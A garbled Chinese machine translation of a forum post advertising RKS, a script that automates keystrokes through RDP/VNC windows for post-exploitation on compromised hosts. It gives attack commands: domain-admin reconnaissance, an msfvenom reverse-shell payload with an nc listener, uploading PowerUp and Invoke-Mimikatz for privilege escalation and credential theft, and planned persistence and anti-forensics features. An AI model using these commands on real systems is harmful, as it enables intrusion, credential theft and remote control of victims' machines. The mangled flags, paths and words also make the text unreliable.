RKS-通过图形桌面程序自动化击键的脚本

taibeihacker

Moderator
通过主动的远程桌面会话自动化击键的脚本,该会话助长了昂贵的操作员,结合使用土地技术。
关于RKS(远程Keystrokes),所有信用都归Nopernik使其成为可能,因此我自己支持它以改进它。我想要在通过远程桌面执行命令时在后剥削阶段有助于的东西。
帮助菜单$ ./rks.sh -H
USAGE:/rks.sh(远程keystrokes)
Options:
-c,-command命令| cmdfile指定命令或包含要执行的文件
-i, - 输入input_file指定本地输入文件以传输
-o, - 输出output_file指定远程输出文件以传输
-m, - 方法方法指定文件传输或执行方法
(对于文件传输'base64',默认设置
未指定。为了执行方法“无”设置
默认情况下,如果未指定)
-p, - platform promest_system指定操作系统(Windows是由
默认值如果未指定)
-w, - windownname名称指定图形遥控器的窗口名称
程序(默认设置FreeRDP,如果不设置
指定的)
-h, - help显示此帮助消息usageInternal侦察,当运行命令提示$ cat recon_cmds.txt
whoami /all
网络用户
净LocalGroup管理员
净用户/域
净组“域名” /域
净组“企业管理员” /域
净组“域计算机” /域
$ ./rks.h -c concon_cmds.txt在阅读PowerShell中有效载荷内容时执行植入植入物。 $ msfvenom -p windowx/x64/shell_reverse_tcp lhost=ip lport=4444 -f psh -o strump1
$ ./rks.sh -c strumpant.ps1
$ NC -LVNP 4444文件传输转移在隔离网络中远程转移文件。如果要指定Windows上的远程路径,请确保包括报价。 $ ./rks.sh -i/usr/share/powersploit/privesc/powerup.ps1 -o script.ps1
$ ./rks.sh -i/usr/share/powersploit/exfiltration/invoke-mimikatz.ps1 -o'c: \ windows \ windows \ temp \ temp \ temp \ temp \ temp \ temp \ temp1'-m base64指定grapical Remotifif fight vnc网络的grapical Remotefif targe vnc网络协议您可以指定窗口名称,您可以将窗口名称指定为theffice the the the窗口。 $ ./rks.sh -i strumpant.ps1 -w tightvnc
如果您要针对具有较旧的RDP身份验证的旧操作系统,则使用RDESKTOP指定窗口名称。 $ ./rks.sh -i strumpant.bat -w rdesktop
待办事项和帮助想要添加文本颜色以获得更好的用户体验
实现base64文件传输
实施BIN2HEX文件传输
为Windows和Linux实现持久功能。
为Windows和Linux实现抗良好功能。
实施以读取ShellCode输入并运行C#植入物和PowerShell Runspace
为Windows和Linux实现PRIVESC函数
参考Video: SETHC.EXE后门CMD有效载荷交付(USB橡胶鸭风格)
原始脚本
sticky_keys_hunter
Creditsnopernik
 
返回
上方